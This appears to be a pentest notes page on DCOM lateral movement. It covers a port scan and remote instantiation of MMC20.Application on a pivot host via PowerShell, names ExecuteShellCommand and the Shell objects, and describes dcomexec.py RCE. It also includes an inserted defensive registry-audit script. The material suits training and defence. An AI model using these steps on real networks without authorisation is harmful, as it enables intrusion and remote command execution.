135 - DCOM

Distributed Component Object Model (DCOM) is a Microsoft technology that allows software components to communicate across different computers on a network. It extends the Component Object Model (COM) to support remote communication. DCOM runs on top of the RPC protocol over TCP/IP: a client first connects to the RPC endpoint mapper on TCP port 135, then switches to a dynamically assigned high port (typically 49152–65535) for further communication.

DCOM objects are identified and configured through the Windows registry. Each object is linked to several key identifiers:

  • CLSID (Class Identifier) is a unique GUID that points to the object’s implementation.

  • ProgID (Programmatic Identifier) is an optional, user-friendly name for the object.

  • AppID (Application Identifier) defines configuration settings such as authentication and remote access permissions for one or more COM objects.

To use DCOM for lateral movement, the attacker must have the required permissions. This usually includes local or network access and membership in groups such as Distributed COM Users or Administrators. These permissions can be configured through the DCOM Configuration tool (dcomcnfg), Group Policy, or the Windows registry.
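As an added defender-side example (not from the original page), the following PowerShell audit script walks the ProgID → CLSID → AppID chain described above for a given object, decodes the per-object LaunchPermission and AccessPermission security descriptors into SDDL, and reports the machine-wide DCOM settings under HKLM\SOFTWARE\Microsoft\Ole together with the local Distributed COM Users membership. The function names are mine; it assumes it is run locally on the Windows host with read access to those registry keys.

```powershell
# Added audit example (not part of the original page). Function names are mine.
# Assumes it runs locally on the Windows host with read access to HKCR and HKLM.
function ConvertFrom-BinarySd {
    param([byte[]]$Bytes)
    if (-not $Bytes) { return '(not set; machine defaults apply)' }
    # REG_BINARY permission values are self-relative security descriptors.
    [System.Security.AccessControl.RawSecurityDescriptor]::new($Bytes, 0).GetSddlForm('All')
}

function Get-DcomObjectConfig {
    param([Parameter(Mandatory)][string]$ProgId)
    # ProgID -> CLSID: the ProgID key's CLSID subkey holds the GUID in its default value.
    $clsid = (Get-ItemProperty -Path "Registry::HKEY_CLASSES_ROOT\$ProgId\CLSID" -ErrorAction Stop).'(default)'
    # CLSID -> AppID: the AppID value on the CLSID key; if absent, machine-wide settings apply.
    $appId = (Get-ItemProperty -Path "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid" -ErrorAction Stop).AppID
    $appKey = if ($appId) { Get-ItemProperty -Path "Registry::HKEY_CLASSES_ROOT\AppID\$appId" -ErrorAction SilentlyContinue }
    [pscustomobject]@{
        ProgId           = $ProgId
        CLSID            = $clsid
        AppID            = $appId
        RunAs            = $appKey.RunAs                                  # identity the server runs as, if set
        LaunchPermission = ConvertFrom-BinarySd $appKey.LaunchPermission  # who may launch/activate it
        AccessPermission = ConvertFrom-BinarySd $appKey.AccessPermission  # who may call it once running
    }
}

function Get-DcomMachineConfig {
    $ole = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Ole'
    [pscustomobject]@{
        EnableDCOM               = $ole.EnableDCOM                        # 'N' disables remote DCOM entirely
        MachineLaunchRestriction = ConvertFrom-BinarySd $ole.MachineLaunchRestriction
        MachineAccessRestriction = ConvertFrom-BinarySd $ole.MachineAccessRestriction
        DefaultLaunchPermission  = ConvertFrom-BinarySd $ole.DefaultLaunchPermission
        DefaultAccessPermission  = ConvertFrom-BinarySd $ole.DefaultAccessPermission
        # Group this page names as granting DCOM use; review who is in it.
        DistributedComUsers      = (Get-LocalGroupMember -Group 'Distributed COM Users' -ErrorAction SilentlyContinue).Name -join ', '
    }
}

Get-DcomObjectConfig -ProgId 'MMC20.Application' | Format-List
Get-DcomMachineConfig | Format-List
```

Broad grants in the launch SDDL (for example to Everyone or Authenticated Users) and an unexpectedly populated Distributed COM Users group are what to look for when reviewing the output.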

Enumeration

$ nmap -p135,49152-65535 10.129.229.244 -A

Lateral Movement

Windows

MMC20.Application


The MMC20.Application object allows remote interaction with Microsoft Management Console (MMC). This enables attackers to execute commands and perform administrative tasks through its GUI components.

# Create an instance of the MMC20.Application object on SVR02 (pivot host)
$mmc = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","172.10.10.25"));

The ExecuteShellCommand method is exposed by the Document.ActiveView property. Its WindowState parameter specifies whether the launched window is minimized, maximized, or restored.

ShellWindows & ShellBrowserWindow

ShellWindows and ShellBrowserWindow objects allow remote interaction with Windows Explorer sessions. ShellWindows can enumerate and control open Explorer windows, enabling file access and command execution, while ShellBrowserWindow provides more specific control over Explorer browser windows and file operations.

Because these objects do not have a ProgID, we must use their CLSID to create them remotely.

Linux

The dcomexec.py script provides RCE on Windows systems using DCOM. It works similarly to WMI-based tools but uses different DCOM endpoints. It retrieves command output over SMB (TCP port 445) through the ADMIN$ share. This tool supports objects such as MMC20.Application, ShellWindows, and ShellBrowserWindow.

If TCP port 445 is unavailable, use -nooutput: the script then does not try to retrieve the output via the ADMIN$ share.
